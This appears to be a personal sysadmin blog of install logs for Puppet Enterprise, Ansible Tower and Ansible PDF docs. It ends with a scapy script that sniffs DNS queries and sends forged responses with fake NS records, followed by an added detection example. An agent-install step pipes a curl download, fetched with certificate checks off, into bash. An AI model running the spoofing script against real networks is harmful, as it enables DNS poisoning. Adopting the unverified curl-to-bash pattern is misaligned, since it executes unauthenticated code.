lost and found ( for me ? )

install puppet enterprise(PE) on Ubuntu 14.04 and manage agent nodes

Here are logs when installing puppet enterprise 3.7.2 on Ubuntu 14.04.

PE*1 ( master.localdomain )
agent * 2 ( agent01.localdomain, agent02.localdomain )

all machines are Ubuntu 14.04.

hostname is

master.localdomain, agent01.localdomain, agent02.localdomain.

[ install PE ]

before installing PE, configure hostname.
# hostname
master

# grep master /etc/hosts
192.168.122.5 master.localdomain master

I have not installed puppet master on this machine.
the installer of PE will install required packages.

# tar xzvf puppet-enterprise-3.7.2-ubuntu-14.04-amd64.tar.gz

# cd puppet-enterprise-3.7.2-ubuntu-14.04-amd64/

run installer.
# ./puppet-enterprise-installer

Please go to https://master.localdomain:4567 in your browser to continue
installation. Be sure to use https:// and that port 4567 is reachable
through the firewall.

open a web browser and go to https://<IP>:4567
the port number might differ from TCP 4567.

enter the hostname and credentials for admin.

It took 20 minutes or so to finish the installation.

After the installation finishes, go to https://<IP>




add nodes to manage them via PE.
log in over SSH to a machine you want to manage.

on the agent.
I configured the PE hostname in the /etc/hosts file on the agent so that the agent can reach the PE by hostname instead of IP address.
download the install script from PE and run it. The -k option makes curl skip TLS certificate verification, so the script is piped to bash without checking that it really came from the master.
# curl https://master.localdomain:8140/packages/current/install.bash -k | bash

Notice: /Service[pe-puppet]/ensure: ensure changed 'stopped' to 'running'
service { 'pe-puppet':
 ensure => 'running',
 enable => 'true',
}

on the PE console, sign the certificate of the agent.
click “1 Node Request” -> Accept

agent01.localdomain is now managed by PE.

Here is a report of agent01
PE console -> Reports -> agent01


service status of SSH


install ansible tower on Ubuntu 14.04

Here are logs when installing ansible tower on Ubuntu 14.04.

Before installing ansible tower, install ansible
# tail -1 /etc/lsb-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

# apt-get install software-properties-common
# apt-add-repository ppa:ansible/ansible
# apt-get update
# apt-get install ansible

# ansible --version
ansible 1.8.2
 configured module search path = None

install ansible tower.
# tar xzvf ansible-tower-setup-latest.tar.gz
# cd ansible-tower-setup-2.1.0/
# ./configure --local
-------------------------------------------
Welcome to the Ansible Tower Install Wizard
-------------------------------------------

This wizard will guide you through the setup process.

LOCAL INSTALLATION
You are installing Ansible Tower on this machine, using an internal database.

PASSWORDS
For security reasons, since this is a new install, you must specify the
following application passwords.

Enter the desired Ansible Tower admin user password:
Enter the desired Munin password:

REVIEW
You selected the following options:

The primary Tower machine is: localhost
Tower will operate on an INTERNAL database.

Are these settings correct (y/n)? y
Settings saved to tower_setup_conf.yml.

FINISHED!
You have completed the setup wizard. You may execute the installation of
Ansible Tower by issuing the following command:

sudo ./setup.sh

error.
# ./setup.sh

TASK: [packages_ubuntu | install awx package with the apt module] *************
failed: [localhost] => {"failed": true}
stderr: E: Version '2.1.0-*' for 'ansible-tower' was not found

stdout: Reading package lists...
Building dependency tree...
Reading state information...

msg: 'apt-get install 'ansible-tower=2.1.0-*'' failed: E: Version '2.1.0-*' for 'ansible-tower' was not found


FATAL: all hosts have already failed -- aborting

PLAY RECAP ********************************************************************
          to retry, use: --limit @/root/site.retry

localhost                  : ok=19   changed=5    unreachable=0    failed=1   

Oops!  An error occured while running setup.

How about installing the following packages?
Someone who succeeded in setting up ansible tower had installed the following packages in advance, so I tried that.
# apt-get install python-dev python-yaml python-paramiko python-jinja2 python-pip sshpass

try again.
I still faced the same error.
TASK: [packages_ubuntu | install awx package with the apt module] *************
failed: [localhost] => {"failed": true}
stderr: E: Version '2.1.0-*' for 'ansible-tower' was not found

stdout: Reading package lists...
Building dependency tree...
Reading state information...

msg: 'apt-get install 'ansible-tower=2.1.0-*'' failed: E: Version '2.1.0-*' for 'ansible-tower' was not found


FATAL: all hosts have already failed -- aborting

PLAY RECAP ********************************************************************
          to retry, use: --limit @/root/site.retry

localhost                  : ok=19   changed=0    unreachable=0    failed=1   

Oops!  An error occured while running setup.

Let’s look at the package details of ansible-tower.
A new version, 2.1.1-1, has been released.
Actually, two or three weeks have passed since I downloaded ansible tower.
# apt-cache show ansible-tower
Package: ansible-tower
Version: 2.1.1-1
Architecture: all
Maintainer: Ansible <support@ansible.com>
Installed-Size: 123341
Depends: apache2, libapache2-mod-wsgi, libzmq3, libzmq3-dev, postgresql, python, python-psycopg2, python-setuptools, python-openssl, python-ldap, python-gevent, python-passlib, python-psutil, python-zmq, supervisor, proot, redis-server, redis-tools, rsyslog, sosreport, sshpass, subversion, mercurial, git, munin, munin-node, ansible
Conflicts: awx
Replaces: awx
Provides: awx
Homepage: http://www.ansible.com/

download ansible tower 2.1.1 and install that.
okay, I was able to install ansible tower.
# tar xzvf ansible-tower-setup-latest.tar.gz
# cd ansible-tower-setup-2.1.1/
# ls
# ./configure --local
# ./setup.sh


PLAY RECAP ********************************************************************
localhost                  : ok=89   changed=52   unreachable=0    failed=0   

The setup process completed successfully.
Setup log saved to /var/log/tower/setup-2015-02-13-02:33:15.log

The problem was that I tried to install the old version.

# /etc/init.d/ansible-tower status
Showing Tower Status
9.3/main (port 5432): online
redis-server is running
* apache2 is running
is running


go to https://<ansible tower IP>

I downloaded the free license key, which can manage up to 10 nodes, and activated that key.


how to stop ansible tower.
# /etc/init.d/ansible-tower stop
Stopping Tower
* Stopping PostgreSQL 9.3 database server                               [ OK ]
Stopping redis-server: redis-server.
* Stopping web server apache2                                                   *
Stopping supervisor: supervisord.
Waiting to allow supervisor time to cleanup ...

Ansible : create an ansible doc as PDF format

Reference
https://github.com/bonndan/ansible-userguide-pdf

Here are logs when creating an ansible 1.8 doc in PDF format.

install required packages to make a PDF.

# apt-get install texlive-latex-base texlive-latex-extra texlive-fonts-recommended
# apt-get install python-sphinx
# git clone https://github.com/ansible/ansible.git
# git clone https://github.com/bonndan/ansible-userguide-pdf.git

create a PDF doc.

# cd ansible-userguide-pdf/

# python build-site.py ../ansible/docsite/rst/
Creating html documentation ...

# cd latex/

# pdflatex --interaction=nonstopmode ansible.tex

# ls *.pdf
ansible.pdf

get things done!

python scapy : send fake DNS responses


# tail -1 /etc/lsb-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

# dpkg -l python-scapy
ii  python-scapy                2.2.0-1            all                Packet generator/sniffer and network scanner/discovery


Here is a sample script of how to send fake DNS responses.
This script returns fake NS records in the authority sections.
# cat fake_DNS.py
#!/usr/bin/env python

from scapy.all import *
import random
import string

domain = 'bar.com'

# random lowercase label used in the fake name server names
def id_generator(size=6, chars=string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))

def dns_spoof(pkt):
#    if domain in pkt[DNS].qd.qname:
    if pkt.dport == 53:
        qname = pkt[DNS].qd.qname
        # four NS records for the queried name, placed in the authority section
        ns = (DNSRR(rrname=qname, type='NS', ttl=3600, rdata='ns1.%s.com' % id_generator())/
              DNSRR(rrname=qname, type='NS', ttl=3600, rdata='ns2.%s.com' % id_generator())/
              DNSRR(rrname=qname, type='NS', ttl=3600, rdata='ns3.%s.com' % id_generator())/
              DNSRR(rrname=qname, type='NS', ttl=3600, rdata='ns4.%s.com' % id_generator()))
        # swap addresses and ports, and reuse the ID and question of the query
        spoofed_pkt = (IP(dst=pkt[IP].src, src=pkt[IP].dst)/
                       UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/
                       DNS(id=pkt[DNS].id, qr=1, aa=0, qd=pkt[DNS].qd, qdcount=1,
                           ancount=0, nscount=4, arcount=0, an=None, ns=ns))
        send(spoofed_pkt)

sniff(filter='udp port 53', iface='eth0', store=0, prn=dns_spoof)


run the script.
# python fake_DNS.py
WARNING: No route found for IPv6 destination :: (no default route?)


send DNS queries to the machine on which the script is running.


This script returns ns1-ns4.<random>.com as name servers in the authority sections.
There are no additional records.
$ dig @192.168.122.5 foo.com

; <<>> DiG 9.9.5-3ubuntu0.1-Ubuntu <<>> @192.168.122.5 foo.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31796
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;foo.com. IN A

;; AUTHORITY SECTION:
foo.com. 3600 IN NS ns1.zsblef.com.
foo.com. 3600 IN NS ns2.loooqo.com.
foo.com. 3600 IN NS ns3.brrppi.com.
foo.com. 3600 IN NS ns4.yjeger.com.

$ dig @192.168.122.5 goooogle.com

; <<>> DiG 9.9.5-3ubuntu0.1-Ubuntu <<>> @192.168.122.5 goooogle.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 941
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;goooogle.com. IN A

;; AUTHORITY SECTION:
goooogle.com. 3600 IN NS ns1.bqurdm.com.
goooogle.com. 3600 IN NS ns2.zwitma.com.
goooogle.com. 3600 IN NS ns3.gmdcjr.com.
goooogle.com. 3600 IN NS ns4.ltctmg.com.
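
Added example, not part of the original post: because the script answers every query it sniffs, a client whose query also reaches a real server gets two different responses carrying the same ID, and a sensor can flag that. The record layout, client address and A records below are constructed for illustration; the NS names are taken from the dig output above.

```python
from collections import defaultdict

# Constructed sample: DNS responses seen by a sensor next to the client.
# Fields: (time_s, client_ip, client_port, txid, qname, rrset), where rrset
# is a frozenset of (section, rrtype, rdata). Addresses are made up; the NS
# names are the ones from the dig output above.
FORGED = frozenset(("authority", "NS", n) for n in (
    "ns1.zsblef.com.", "ns2.loooqo.com.", "ns3.brrppi.com.", "ns4.yjeger.com."))
GENUINE = frozenset({("answer", "A", "203.0.113.10")})
OTHER = frozenset({("answer", "A", "203.0.113.20")})
SAMPLE = [
    (10.001, "192.168.122.20", 40001, 31796, "foo.com.", FORGED),
    (10.030, "192.168.122.20", 40001, 31796, "foo.com.", GENUINE),
    (11.500, "192.168.122.20", 40002, 941, "example.org.", OTHER),
    (11.900, "192.168.122.20", 40002, 941, "example.org.", OTHER),  # retransmit
]

def is_bare_referral(rrset):
    """Only NS records in the authority section: the shape the script emits."""
    return bool(rrset) and all(s == "authority" and t == "NS" for s, t, _ in rrset)

def find_conflicts(responses, window=2.0):
    """Flag queries that received two different responses within `window` seconds."""
    seen = defaultdict(list)   # query key -> [(time, rrset), ...]
    alerts = []
    for t, ip, port, txid, qname, rrset in sorted(responses, key=lambda r: r[0]):
        key = (ip, port, txid, qname.lower())
        for t0, earlier in seen[key]:
            # identical retransmissions are ignored; differing content is not
            if t - t0 <= window and earlier != rrset:
                alerts.append({
                    "query": key,
                    "gap_s": round(t - t0, 3),
                    "bare_referrals": [is_bare_referral(earlier), is_bare_referral(rrset)],
                })
        seen[key].append((t, rrset))
    return alerts

if __name__ == "__main__":
    for alert in find_conflicts(SAMPLE):
        print(alert)
```

The "bare_referrals" flags show which of the two conflicting responses has the NS-only shape seen in the dig output (ANSWER 0, AUTHORITY 4, ADDITIONAL 0).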